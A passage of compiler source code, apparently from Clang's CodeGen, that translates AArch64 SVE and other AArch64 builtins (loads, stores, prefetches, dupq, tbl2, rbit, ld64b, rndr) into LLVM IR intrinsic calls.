Ops[3] = Builder.CreateMul(Ops[3], Scale);
}
return Builder.CreateCall(F, Ops);
}
Value *CodeGenFunction::EmitSVEGatherPrefetch(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value *> &Ops,
unsigned IntID) {
// The gather prefetches are overloaded on the vector input - this can either
// be the vector of base addresses or vector of offsets.
auto *OverloadedTy = dyn_cast<llvm::ScalableVectorType>(Ops[1]->getType());
if (!OverloadedTy)
OverloadedTy = cast<llvm::ScalableVectorType>(Ops[2]->getType());
// Cast the predicate from svbool_t to the right number of elements.
Ops[0] = EmitSVEPredicateCast(Ops[0], OverloadedTy);
// vector + imm addressing modes
if (Ops[1]->getType()->isVectorTy()) {
if (Ops.size() == 3) {
// Pass 0 for 'vector+imm' when the index is omitted.
Ops.push_back(ConstantInt::get(Int64Ty, 0));
// The sv_prfop is the last operand in the builtin and IR intrinsic.
std::swap(Ops[2], Ops[3]);
} else {
// Index needs to be passed as scaled offset.
llvm::Type *MemEltTy = SVEBuiltinMemEltTy(TypeFlags);
unsigned BytesPerElt = MemEltTy->getPrimitiveSizeInBits() / 8;
Value *Scale = ConstantInt::get(Int64Ty, BytesPerElt);
Ops[2] = Builder.CreateMul(Ops[2], Scale);
}
}
Function *F = CGM.getIntrinsic(IntID, OverloadedTy);
return Builder.CreateCall(F, Ops);
}
Value *CodeGenFunction::EmitSVEStructLoad(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value*> &Ops,
unsigned IntID) {
llvm::ScalableVectorType *VTy = getSVEType(TypeFlags);
auto VecPtrTy = llvm::PointerType::getUnqual(VTy);
auto EltPtrTy = llvm::PointerType::getUnqual(VTy->getElementType());
unsigned N;
switch (IntID) {
case Intrinsic::aarch64_sve_ld2:
N = 2;
break;
case Intrinsic::aarch64_sve_ld3:
N = 3;
break;
case Intrinsic::aarch64_sve_ld4:
N = 4;
break;
default:
llvm_unreachable("unknown intrinsic!");
}
auto RetTy = llvm::VectorType::get(VTy->getElementType(),
VTy->getElementCount() * N);
Value *Predicate = EmitSVEPredicateCast(Ops[0], VTy);
Value *BasePtr= Builder.CreateBitCast(Ops[1], VecPtrTy);
Value *Offset = Ops.size() > 2 ? Ops[2] : Builder.getInt32(0);
BasePtr = Builder.CreateGEP(VTy, BasePtr, Offset);
BasePtr = Builder.CreateBitCast(BasePtr, EltPtrTy);
Function *F = CGM.getIntrinsic(IntID, {RetTy, Predicate->getType()});
return Builder.CreateCall(F, { Predicate, BasePtr });
}
Value *CodeGenFunction::EmitSVEStructStore(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value*> &Ops,
unsigned IntID) {
llvm::ScalableVectorType *VTy = getSVEType(TypeFlags);
auto VecPtrTy = llvm::PointerType::getUnqual(VTy);
auto EltPtrTy = llvm::PointerType::getUnqual(VTy->getElementType());
unsigned N;
switch (IntID) {
case Intrinsic::aarch64_sve_st2:
N = 2;
break;
case Intrinsic::aarch64_sve_st3:
N = 3;
break;
case Intrinsic::aarch64_sve_st4:
N = 4;
break;
default:
llvm_unreachable("unknown intrinsic!");
}
auto TupleTy =
llvm::VectorType::get(VTy->getElementType(), VTy->getElementCount() * N);
Value *Predicate = EmitSVEPredicateCast(Ops[0], VTy);
Value *BasePtr = Builder.CreateBitCast(Ops[1], VecPtrTy);
Value *Offset = Ops.size() > 3 ? Ops[2] : Builder.getInt32(0);
Value *Val = Ops.back();
BasePtr = Builder.CreateGEP(VTy, BasePtr, Offset);
BasePtr = Builder.CreateBitCast(BasePtr, EltPtrTy);
// The llvm.aarch64.sve.st2/3/4 intrinsics take legal part vectors, so we
// need to break up the tuple vector.
SmallVector<llvm::Value*, 5> Operands;
Function *FExtr =
CGM.getIntrinsic(Intrinsic::aarch64_sve_tuple_get, {VTy, TupleTy});
for (unsigned I = 0; I < N; ++I)
Operands.push_back(Builder.CreateCall(FExtr, {Val, Builder.getInt32(I)}));
Operands.append({Predicate, BasePtr});
Function *F = CGM.getIntrinsic(IntID, { VTy });
return Builder.CreateCall(F, Operands);
}
// SVE2's svpmullb and svpmullt builtins are similar to the svpmullb_pair and
// svpmullt_pair intrinsics, with the exception that their results are bitcast
// to a wider type.
Value *CodeGenFunction::EmitSVEPMull(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value *> &Ops,
unsigned BuiltinID) {
// Splat scalar operand to vector (intrinsics with _n infix)
if (TypeFlags.hasSplatOperand()) {
unsigned OpNo = TypeFlags.getSplatOperand();
Ops[OpNo] = EmitSVEDupX(Ops[OpNo]);
}
// The pair-wise function has a narrower overloaded type.
Function *F = CGM.getIntrinsic(BuiltinID, Ops[0]->getType());
Value *Call = Builder.CreateCall(F, {Ops[0], Ops[1]});
// Now bitcast to the wider result type.
llvm::ScalableVectorType *Ty = getSVEType(TypeFlags);
return EmitSVEReinterpret(Call, Ty);
}
Value *CodeGenFunction::EmitSVEMovl(const SVETypeFlags &TypeFlags,
ArrayRef<Value *> Ops, unsigned BuiltinID) {
llvm::Type *OverloadedTy = getSVEType(TypeFlags);
Function *F = CGM.getIntrinsic(BuiltinID, OverloadedTy);
return Builder.CreateCall(F, {Ops[0], Builder.getInt32(0)});
}
Value *CodeGenFunction::EmitSVEPrefetchLoad(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value *> &Ops,
unsigned BuiltinID) {
auto *MemEltTy = SVEBuiltinMemEltTy(TypeFlags);
auto *VectorTy = getSVEVectorForElementType(MemEltTy);
auto *MemoryTy = llvm::ScalableVectorType::get(MemEltTy, VectorTy);
Value *Predicate = EmitSVEPredicateCast(Ops[0], MemoryTy);
Value *BasePtr = Ops[1];
// Implement the index operand if not omitted.
if (Ops.size() > 3) {
BasePtr = Builder.CreateBitCast(BasePtr, MemoryTy->getPointerTo());
BasePtr = Builder.CreateGEP(MemoryTy, BasePtr, Ops[2]);
}
// Prefetch intriniscs always expect an i8*
BasePtr = Builder.CreateBitCast(BasePtr, llvm::PointerType::getUnqual(Int8Ty));
Value *PrfOp = Ops.back();
Function *F = CGM.getIntrinsic(BuiltinID, Predicate->getType());
return Builder.CreateCall(F, {Predicate, BasePtr, PrfOp});
}
Value *CodeGenFunction::EmitSVEMaskedLoad(const CallExpr *E,
llvm::Type *ReturnTy,
SmallVectorImpl<Value *> &Ops,
unsigned BuiltinID,
bool IsZExtReturn) {
QualType LangPTy = E->getArg(1)->getType();
llvm::Type *MemEltTy = CGM.getTypes().ConvertType(
LangPTy->castAs<PointerType>()->getPointeeType());
// The vector type that is returned may be different from the
// eventual type loaded from memory.
auto VectorTy = cast<llvm::ScalableVectorType>(ReturnTy);
auto MemoryTy = llvm::ScalableVectorType::get(MemEltTy, VectorTy);
Value *Predicate = EmitSVEPredicateCast(Ops[0], MemoryTy);
Value *BasePtr = Builder.CreateBitCast(Ops[1], MemoryTy->getPointerTo());
Value *Offset = Ops.size() > 2 ? Ops[2] : Builder.getInt32(0);
BasePtr = Builder.CreateGEP(MemoryTy, BasePtr, Offset);
BasePtr = Builder.CreateBitCast(BasePtr, MemEltTy->getPointerTo());
Function *F = CGM.getIntrinsic(BuiltinID, MemoryTy);
Value *Load = Builder.CreateCall(F, {Predicate, BasePtr});
return IsZExtReturn ? Builder.CreateZExt(Load, VectorTy)
: Builder.CreateSExt(Load, VectorTy);
}
Value *CodeGenFunction::EmitSVEMaskedStore(const CallExpr *E,
SmallVectorImpl<Value *> &Ops,
unsigned BuiltinID) {
QualType LangPTy = E->getArg(1)->getType();
llvm::Type *MemEltTy = CGM.getTypes().ConvertType(
LangPTy->castAs<PointerType>()->getPointeeType());
// The vector type that is stored may be different from the
// eventual type stored to memory.
auto VectorTy = cast<llvm::ScalableVectorType>(Ops.back()->getType());
auto MemoryTy = llvm::ScalableVectorType::get(MemEltTy, VectorTy);
Value *Predicate = EmitSVEPredicateCast(Ops[0], MemoryTy);
Value *BasePtr = Builder.CreateBitCast(Ops[1], MemoryTy->getPointerTo());
Value *Offset = Ops.size() == 4 ? Ops[2] : Builder.getInt32(0);
BasePtr = Builder.CreateGEP(MemoryTy, BasePtr, Offset);
// Last value is always the data
llvm::Value *Val = Builder.CreateTrunc(Ops.back(), MemoryTy);
BasePtr = Builder.CreateBitCast(BasePtr, MemEltTy->getPointerTo());
Function *F = CGM.getIntrinsic(BuiltinID, MemoryTy);
return Builder.CreateCall(F, {Val, Predicate, BasePtr});
}
// Limit the usage of scalable llvm IR generated by the ACLE by using the
// sve dup.x intrinsic instead of IRBuilder::CreateVectorSplat.
Value *CodeGenFunction::EmitSVEDupX(Value *Scalar, llvm::Type *Ty) {
auto F = CGM.getIntrinsic(Intrinsic::aarch64_sve_dup_x, Ty);
return Builder.CreateCall(F, Scalar);
}
Value *CodeGenFunction::EmitSVEDupX(Value* Scalar) {
return EmitSVEDupX(Scalar, getSVEVectorForElementType(Scalar->getType()));
}
Value *CodeGenFunction::EmitSVEReinterpret(Value *Val, llvm::Type *Ty) {
// FIXME: For big endian this needs an additional REV, or needs a separate
// intrinsic that is code-generated as a no-op, because the LLVM bitcast
// instruction is defined as 'bitwise' equivalent from memory point of
// view (when storing/reloading), whereas the svreinterpret builtin
// implements bitwise equivalent cast from register point of view.
// LLVM CodeGen for a bitcast must add an explicit REV for big-endian.
return Builder.CreateBitCast(Val, Ty);
}
static void InsertExplicitZeroOperand(CGBuilderTy &Builder, llvm::Type *Ty,
SmallVectorImpl<Value *> &Ops) {
auto *SplatZero = Constant::getNullValue(Ty);
Ops.insert(Ops.begin(), SplatZero);
}
static void InsertExplicitUndefOperand(CGBuilderTy &Builder, llvm::Type *Ty,
SmallVectorImpl<Value *> &Ops) {
auto *SplatUndef = UndefValue::get(Ty);
Ops.insert(Ops.begin(), SplatUndef);
}
SmallVector<llvm::Type *, 2>
CodeGenFunction::getSVEOverloadTypes(const SVETypeFlags &TypeFlags,
llvm::Type *ResultType,
ArrayRef<Value *> Ops) {
if (TypeFlags.isOverloadNone())
return {};
llvm::Type *DefaultType = getSVEType(TypeFlags);
if (TypeFlags.isOverloadWhile())
return {DefaultType, Ops[1]->getType()};
if (TypeFlags.isOverloadWhileRW())
return {getSVEPredType(TypeFlags), Ops[0]->getType()};
if (TypeFlags.isOverloadCvt() || TypeFlags.isTupleSet())
return {Ops[0]->getType(), Ops.back()->getType()};
if (TypeFlags.isTupleCreate() || TypeFlags.isTupleGet())
return {ResultType, Ops[0]->getType()};
assert(TypeFlags.isOverloadDefault() && "Unexpected value for overloads");
return {DefaultType};
}
Value *CodeGenFunction::EmitAArch64SVEBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
// Find out if any arguments are required to be integer constant expressions.
unsigned ICEArguments = 0;
ASTContext::GetBuiltinTypeError Error;
getContext().GetBuiltinType(BuiltinID, Error, &ICEArguments);
assert(Error == ASTContext::GE_None && "Should not codegen an error");
llvm::Type *Ty = ConvertType(E->getType());
if (BuiltinID >= SVE::BI__builtin_sve_reinterpret_s8_s8 &&
BuiltinID <= SVE::BI__builtin_sve_reinterpret_f64_f64) {
Value *Val = EmitScalarExpr(E->getArg(0));
return EmitSVEReinterpret(Val, Ty);
}
llvm::SmallVector<Value *, 4> Ops;
for (unsigned i = 0, e = E->getNumArgs(); i != e; i++) {
if ((ICEArguments & (1 << i)) == 0)
Ops.push_back(EmitScalarExpr(E->getArg(i)));
else {
// If this is required to be a constant, constant fold it so that we know
// that the generated intrinsic gets a ConstantInt.
Optional<llvm::APSInt> Result =
E->getArg(i)->getIntegerConstantExpr(getContext());
assert(Result && "Expected argument to be a constant");
// Immediates for SVE llvm intrinsics are always 32bit. We can safely
// truncate because the immediate has been range checked and no valid
// immediate requires more than a handful of bits.
*Result = Result->extOrTrunc(32);
Ops.push_back(llvm::ConstantInt::get(getLLVMContext(), *Result));
}
}
auto *Builtin = findARMVectorIntrinsicInMap(AArch64SVEIntrinsicMap, BuiltinID,
AArch64SVEIntrinsicsProvenSorted);
SVETypeFlags TypeFlags(Builtin->TypeModifier);
if (TypeFlags.isLoad())
return EmitSVEMaskedLoad(E, Ty, Ops, Builtin->LLVMIntrinsic,
TypeFlags.isZExtReturn());
else if (TypeFlags.isStore())
return EmitSVEMaskedStore(E, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isGatherLoad())
return EmitSVEGatherLoad(TypeFlags, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isScatterStore())
return EmitSVEScatterStore(TypeFlags, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isPrefetch())
return EmitSVEPrefetchLoad(TypeFlags, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isGatherPrefetch())
return EmitSVEGatherPrefetch(TypeFlags, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isStructLoad())
return EmitSVEStructLoad(TypeFlags, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isStructStore())
return EmitSVEStructStore(TypeFlags, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isUndef())
return UndefValue::get(Ty);
else if (Builtin->LLVMIntrinsic != 0) {
if (TypeFlags.getMergeType() == SVETypeFlags::MergeZeroExp)
InsertExplicitZeroOperand(Builder, Ty, Ops);
if (TypeFlags.getMergeType() == SVETypeFlags::MergeAnyExp)
InsertExplicitUndefOperand(Builder, Ty, Ops);
// Some ACLE builtins leave out the argument to specify the predicate
// pattern, which is expected to be expanded to an SV_ALL pattern.
if (TypeFlags.isAppendSVALL())
Ops.push_back(Builder.getInt32(/*SV_ALL*/ 31));
if (TypeFlags.isInsertOp1SVALL())
Ops.insert(&Ops[1], Builder.getInt32(/*SV_ALL*/ 31));
// Predicates must match the main datatype.
for (unsigned i = 0, e = Ops.size(); i != e; ++i)
if (auto PredTy = dyn_cast<llvm::VectorType>(Ops[i]->getType()))
if (PredTy->getElementType()->isIntegerTy(1))
Ops[i] = EmitSVEPredicateCast(Ops[i], getSVEType(TypeFlags));
// Splat scalar operand to vector (intrinsics with _n infix)
if (TypeFlags.hasSplatOperand()) {
unsigned OpNo = TypeFlags.getSplatOperand();
Ops[OpNo] = EmitSVEDupX(Ops[OpNo]);
}
if (TypeFlags.isReverseCompare())
std::swap(Ops[1], Ops[2]);
if (TypeFlags.isReverseUSDOT())
std::swap(Ops[1], Ops[2]);
// Predicated intrinsics with _z suffix need a select w/ zeroinitializer.
if (TypeFlags.getMergeType() == SVETypeFlags::MergeZero) {
llvm::Type *OpndTy = Ops[1]->getType();
auto *SplatZero = Constant::getNullValue(OpndTy);
Function *Sel = CGM.getIntrinsic(Intrinsic::aarch64_sve_sel, OpndTy);
Ops[1] = Builder.CreateCall(Sel, {Ops[0], Ops[1], SplatZero});
}
Function *F = CGM.getIntrinsic(Builtin->LLVMIntrinsic,
getSVEOverloadTypes(TypeFlags, Ty, Ops));
Value *Call = Builder.CreateCall(F, Ops);
// Predicate results must be converted to svbool_t.
if (auto PredTy = dyn_cast<llvm::VectorType>(Call->getType()))
if (PredTy->getScalarType()->isIntegerTy(1))
Call = EmitSVEPredicateCast(Call, cast<llvm::ScalableVectorType>(Ty));
return Call;
}
switch (BuiltinID) {
default:
return nullptr;
case SVE::BI__builtin_sve_svmov_b_z: {
// svmov_b_z(pg, op) <=> svand_b_z(pg, op, op)
SVETypeFlags TypeFlags(Builtin->TypeModifier);
llvm::Type* OverloadedTy = getSVEType(TypeFlags);
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_sve_and_z, OverloadedTy);
return Builder.CreateCall(F, {Ops[0], Ops[1], Ops[1]});
}
case SVE::BI__builtin_sve_svnot_b_z: {
// svnot_b_z(pg, op) <=> sveor_b_z(pg, op, pg)
SVETypeFlags TypeFlags(Builtin->TypeModifier);
llvm::Type* OverloadedTy = getSVEType(TypeFlags);
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_sve_eor_z, OverloadedTy);
return Builder.CreateCall(F, {Ops[0], Ops[1], Ops[0]});
}
case SVE::BI__builtin_sve_svmovlb_u16:
case SVE::BI__builtin_sve_svmovlb_u32:
case SVE::BI__builtin_sve_svmovlb_u64:
return EmitSVEMovl(TypeFlags, Ops, Intrinsic::aarch64_sve_ushllb);
case SVE::BI__builtin_sve_svmovlb_s16:
case SVE::BI__builtin_sve_svmovlb_s32:
case SVE::BI__builtin_sve_svmovlb_s64:
return EmitSVEMovl(TypeFlags, Ops, Intrinsic::aarch64_sve_sshllb);
case SVE::BI__builtin_sve_svmovlt_u16:
case SVE::BI__builtin_sve_svmovlt_u32:
case SVE::BI__builtin_sve_svmovlt_u64:
return EmitSVEMovl(TypeFlags, Ops, Intrinsic::aarch64_sve_ushllt);
case SVE::BI__builtin_sve_svmovlt_s16:
case SVE::BI__builtin_sve_svmovlt_s32:
case SVE::BI__builtin_sve_svmovlt_s64:
return EmitSVEMovl(TypeFlags, Ops, Intrinsic::aarch64_sve_sshllt);
case SVE::BI__builtin_sve_svpmullt_u16:
case SVE::BI__builtin_sve_svpmullt_u64:
case SVE::BI__builtin_sve_svpmullt_n_u16:
case SVE::BI__builtin_sve_svpmullt_n_u64:
return EmitSVEPMull(TypeFlags, Ops, Intrinsic::aarch64_sve_pmullt_pair);
case SVE::BI__builtin_sve_svpmullb_u16:
case SVE::BI__builtin_sve_svpmullb_u64:
case SVE::BI__builtin_sve_svpmullb_n_u16:
case SVE::BI__builtin_sve_svpmullb_n_u64:
return EmitSVEPMull(TypeFlags, Ops, Intrinsic::aarch64_sve_pmullb_pair);
case SVE::BI__builtin_sve_svdup_n_b8:
case SVE::BI__builtin_sve_svdup_n_b16:
case SVE::BI__builtin_sve_svdup_n_b32:
case SVE::BI__builtin_sve_svdup_n_b64: {
Value *CmpNE =
Builder.CreateICmpNE(Ops[0], Constant::getNullValue(Ops[0]->getType()));
llvm::ScalableVectorType *OverloadedTy = getSVEType(TypeFlags);
Value *Dup = EmitSVEDupX(CmpNE, OverloadedTy);
return EmitSVEPredicateCast(Dup, cast<llvm::ScalableVectorType>(Ty));
}
case SVE::BI__builtin_sve_svdupq_n_b8:
case SVE::BI__builtin_sve_svdupq_n_b16:
case SVE::BI__builtin_sve_svdupq_n_b32:
case SVE::BI__builtin_sve_svdupq_n_b64:
case SVE::BI__builtin_sve_svdupq_n_u8:
case SVE::BI__builtin_sve_svdupq_n_s8:
case SVE::BI__builtin_sve_svdupq_n_u64:
case SVE::BI__builtin_sve_svdupq_n_f64:
case SVE::BI__builtin_sve_svdupq_n_s64:
case SVE::BI__builtin_sve_svdupq_n_u16:
case SVE::BI__builtin_sve_svdupq_n_f16:
case SVE::BI__builtin_sve_svdupq_n_bf16:
case SVE::BI__builtin_sve_svdupq_n_s16:
case SVE::BI__builtin_sve_svdupq_n_u32:
case SVE::BI__builtin_sve_svdupq_n_f32:
case SVE::BI__builtin_sve_svdupq_n_s32: {
// These builtins are implemented by storing each element to an array and using
// ld1rq to materialize a vector.
unsigned NumOpnds = Ops.size();
bool IsBoolTy =
cast<llvm::VectorType>(Ty)->getElementType()->isIntegerTy(1);
// For svdupq_n_b* the element type of is an integer of type 128/numelts,
// so that the compare can use the width that is natural for the expected
// number of predicate lanes.
llvm::Type *EltTy = Ops[0]->getType();
if (IsBoolTy)
EltTy = IntegerType::get(getLLVMContext(), SVEBitsPerBlock / NumOpnds);
SmallVector<llvm::Value *, 16> VecOps;
for (unsigned I = 0; I < NumOpnds; ++I)
VecOps.push_back(Builder.CreateZExt(Ops[I], EltTy));
Value *Vec = BuildVector(VecOps);
SVETypeFlags TypeFlags(Builtin->TypeModifier);
Value *Pred = EmitSVEAllTruePred(TypeFlags);
llvm::Type *OverloadedTy = getSVEVectorForElementType(EltTy);
Value *InsertSubVec = Builder.CreateInsertVector(
OverloadedTy, UndefValue::get(OverloadedTy), Vec, Builder.getInt64(0));
Function *F =
CGM.getIntrinsic(Intrinsic::aarch64_sve_dupq_lane, OverloadedTy);
Value *DupQLane =
Builder.CreateCall(F, {InsertSubVec, Builder.getInt64(0)});
if (!IsBoolTy)
return DupQLane;
// For svdupq_n_b* we need to add an additional 'cmpne' with '0'.
F = CGM.getIntrinsic(NumOpnds == 2 ? Intrinsic::aarch64_sve_cmpne
: Intrinsic::aarch64_sve_cmpne_wide,
OverloadedTy);
Value *Call = Builder.CreateCall(
F, {Pred, DupQLane, EmitSVEDupX(Builder.getInt64(0))});
return EmitSVEPredicateCast(Call, cast<llvm::ScalableVectorType>(Ty));
}
case SVE::BI__builtin_sve_svpfalse_b:
return ConstantInt::getFalse(Ty);
case SVE::BI__builtin_sve_svlen_bf16:
case SVE::BI__builtin_sve_svlen_f16:
case SVE::BI__builtin_sve_svlen_f32:
case SVE::BI__builtin_sve_svlen_f64:
case SVE::BI__builtin_sve_svlen_s8:
case SVE::BI__builtin_sve_svlen_s16:
case SVE::BI__builtin_sve_svlen_s32:
case SVE::BI__builtin_sve_svlen_s64:
case SVE::BI__builtin_sve_svlen_u8:
case SVE::BI__builtin_sve_svlen_u16:
case SVE::BI__builtin_sve_svlen_u32:
case SVE::BI__builtin_sve_svlen_u64: {
SVETypeFlags TF(Builtin->TypeModifier);
auto VTy = cast<llvm::VectorType>(getSVEType(TF));
auto *NumEls =
llvm::ConstantInt::get(Ty, VTy->getElementCount().getKnownMinValue());
Function *F = CGM.getIntrinsic(Intrinsic::vscale, Ty);
return Builder.CreateMul(NumEls, Builder.CreateCall(F));
}
case SVE::BI__builtin_sve_svtbl2_u8:
case SVE::BI__builtin_sve_svtbl2_s8:
case SVE::BI__builtin_sve_svtbl2_u16:
case SVE::BI__builtin_sve_svtbl2_s16:
case SVE::BI__builtin_sve_svtbl2_u32:
case SVE::BI__builtin_sve_svtbl2_s32:
case SVE::BI__builtin_sve_svtbl2_u64:
case SVE::BI__builtin_sve_svtbl2_s64:
case SVE::BI__builtin_sve_svtbl2_f16:
case SVE::BI__builtin_sve_svtbl2_bf16:
case SVE::BI__builtin_sve_svtbl2_f32:
case SVE::BI__builtin_sve_svtbl2_f64: {
SVETypeFlags TF(Builtin->TypeModifier);
auto VTy = cast<llvm::VectorType>(getSVEType(TF));
auto TupleTy = llvm::VectorType::getDoubleElementsVectorType(VTy);
Function *FExtr =
CGM.getIntrinsic(Intrinsic::aarch64_sve_tuple_get, {VTy, TupleTy});
Value *V0 = Builder.CreateCall(FExtr, {Ops[0], Builder.getInt32(0)});
Value *V1 = Builder.CreateCall(FExtr, {Ops[0], Builder.getInt32(1)});
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_sve_tbl2, VTy);
return Builder.CreateCall(F, {V0, V1, Ops[1]});
}
}
/// Should not happen
return nullptr;
}
Value *CodeGenFunction::EmitAArch64BuiltinExpr(unsigned BuiltinID,
const CallExpr *E,
llvm::Triple::ArchType Arch) {
if (BuiltinID >= AArch64::FirstSVEBuiltin &&
BuiltinID <= AArch64::LastSVEBuiltin)
return EmitAArch64SVEBuiltinExpr(BuiltinID, E);
unsigned HintID = static_cast<unsigned>(-1);
switch (BuiltinID) {
default: break;
case AArch64::BI__builtin_arm_nop:
HintID = 0;
break;
case AArch64::BI__builtin_arm_yield:
case AArch64::BI__yield:
HintID = 1;
break;
case AArch64::BI__builtin_arm_wfe:
case AArch64::BI__wfe:
HintID = 2;
break;
case AArch64::BI__builtin_arm_wfi:
case AArch64::BI__wfi:
HintID = 3;
break;
case AArch64::BI__builtin_arm_sev:
case AArch64::BI__sev:
HintID = 4;
break;
case AArch64::BI__builtin_arm_sevl:
case AArch64::BI__sevl:
HintID = 5;
break;
}
if (HintID != static_cast<unsigned>(-1)) {
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_hint);
return Builder.CreateCall(F, llvm::ConstantInt::get(Int32Ty, HintID));
}
if (BuiltinID == AArch64::BI__builtin_arm_prefetch) {
Value *Address = EmitScalarExpr(E->getArg(0));
Value *RW = EmitScalarExpr(E->getArg(1));
Value *CacheLevel = EmitScalarExpr(E->getArg(2));
Value *RetentionPolicy = EmitScalarExpr(E->getArg(3));
Value *IsData = EmitScalarExpr(E->getArg(4));
Value *Locality = nullptr;
if (cast<llvm::ConstantInt>(RetentionPolicy)->isZero()) {
// Temporal fetch, needs to convert cache level to locality.
Locality = llvm::ConstantInt::get(Int32Ty,
-cast<llvm::ConstantInt>(CacheLevel)->getValue() + 3);
} else {
// Streaming fetch.
Locality = llvm::ConstantInt::get(Int32Ty, 0);
}
// FIXME: We need AArch64 specific LLVM intrinsic if we want to specify
// PLDL3STRM or PLDL2STRM.
Function *F = CGM.getIntrinsic(Intrinsic::prefetch, Address->getType());
return Builder.CreateCall(F, {Address, RW, Locality, IsData});
}
if (BuiltinID == AArch64::BI__builtin_arm_rbit) {
assert((getContext().getTypeSize(E->getType()) == 32) &&
"rbit of unusual size!");
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(
CGM.getIntrinsic(Intrinsic::bitreverse, Arg->getType()), Arg, "rbit");
}
if (BuiltinID == AArch64::BI__builtin_arm_rbit64) {
assert((getContext().getTypeSize(E->getType()) == 64) &&
"rbit of unusual size!");
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(
CGM.getIntrinsic(Intrinsic::bitreverse, Arg->getType()), Arg, "rbit");
}
if (BuiltinID == AArch64::BI__builtin_arm_cls) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::aarch64_cls), Arg,
"cls");
}
if (BuiltinID == AArch64::BI__builtin_arm_cls64) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::aarch64_cls64), Arg,
"cls");
}
if (BuiltinID == AArch64::BI__builtin_arm_frint32zf ||
BuiltinID == AArch64::BI__builtin_arm_frint32z) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
llvm::Type *Ty = Arg->getType();
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::aarch64_frint32z, Ty),
Arg, "frint32z");
}
if (BuiltinID == AArch64::BI__builtin_arm_frint64zf ||
BuiltinID == AArch64::BI__builtin_arm_frint64z) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
llvm::Type *Ty = Arg->getType();
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::aarch64_frint64z, Ty),
Arg, "frint64z");
}
if (BuiltinID == AArch64::BI__builtin_arm_frint32xf ||
BuiltinID == AArch64::BI__builtin_arm_frint32x) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
llvm::Type *Ty = Arg->getType();
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::aarch64_frint32x, Ty),
Arg, "frint32x");
}
if (BuiltinID == AArch64::BI__builtin_arm_frint64xf ||
BuiltinID == AArch64::BI__builtin_arm_frint64x) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
llvm::Type *Ty = Arg->getType();
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::aarch64_frint64x, Ty),
Arg, "frint64x");
}
if (BuiltinID == AArch64::BI__builtin_arm_jcvt) {
assert((getContext().getTypeSize(E->getType()) == 32) &&
"__jcvt of unusual size!");
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(
CGM.getIntrinsic(Intrinsic::aarch64_fjcvtzs), Arg);
}
if (BuiltinID == AArch64::BI__builtin_arm_ld64b ||
BuiltinID == AArch64::BI__builtin_arm_st64b ||
BuiltinID == AArch64::BI__builtin_arm_st64bv ||
BuiltinID == AArch64::BI__builtin_arm_st64bv0) {
llvm::Value *MemAddr = EmitScalarExpr(E->getArg(0));
llvm::Value *ValPtr = EmitScalarExpr(E->getArg(1));
if (BuiltinID == AArch64::BI__builtin_arm_ld64b) {
// Load from the address via an LLVM intrinsic, receiving a
// tuple of 8 i64 words, and store each one to ValPtr.
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_ld64b);
llvm::Value *Val = Builder.CreateCall(F, MemAddr);
llvm::Value *ToRet;
for (size_t i = 0; i < 8; i++) {
llvm::Value *ValOffsetPtr =
Builder.CreateGEP(Int64Ty, ValPtr, Builder.getInt32(i));
Address Addr(ValOffsetPtr, CharUnits::fromQuantity(8));
ToRet = Builder.CreateStore(Builder.CreateExtractValue(Val, i), Addr);
}
return ToRet;
} else {
// Load 8 i64 words from ValPtr, and store them to the address
// via an LLVM intrinsic.
SmallVector<llvm::Value *, 9> Args;
Args.push_back(MemAddr);
for (size_t i = 0; i < 8; i++) {
llvm::Value *ValOffsetPtr =
Builder.CreateGEP(Int64Ty, ValPtr, Builder.getInt32(i));
Address Addr(ValOffsetPtr, CharUnits::fromQuantity(8));
Args.push_back(Builder.CreateLoad(Addr));
}
auto Intr = (BuiltinID == AArch64::BI__builtin_arm_st64b
? Intrinsic::aarch64_st64b
: BuiltinID == AArch64::BI__builtin_arm_st64bv
? Intrinsic::aarch64_st64bv
: Intrinsic::aarch64_st64bv0);
Function *F = CGM.getIntrinsic(Intr);
return Builder.CreateCall(F, Args);
}
}
if (BuiltinID == AArch64::BI__builtin_arm_rndr ||
BuiltinID == AArch64::BI__builtin_arm_rndrrs) {
auto Intr = (BuiltinID == AArch64::BI__builtin_arm_rndr
? Intrinsic::aarch64_rndr
: Intrinsic::aarch64_rndrrs);
Function *F = CGM.getIntrinsic(Intr);
llvm::Value *Val = Builder.CreateCall(F);
Value *RandomValue = Builder.CreateExtractValue(Val, 0);
Value *Status = Builder.CreateExtractValue(Val, 1);
Address MemAddress = EmitPointerWithAlignment(E->getArg(0));
Builder.CreateStore(RandomValue, MemAddress);
Status = Builder.CreateZExt(Status, Int32Ty);
return Status;
}
if (BuiltinID == AArch64::BI__clear_cache) {
assert(E->getNumArgs() == 2 && "__clear_cache takes 2 arguments");
const FunctionDecl *FD = E->getDirectCallee();
Value *Ops[2];
for (unsigned i = 0; i < 2; i++)
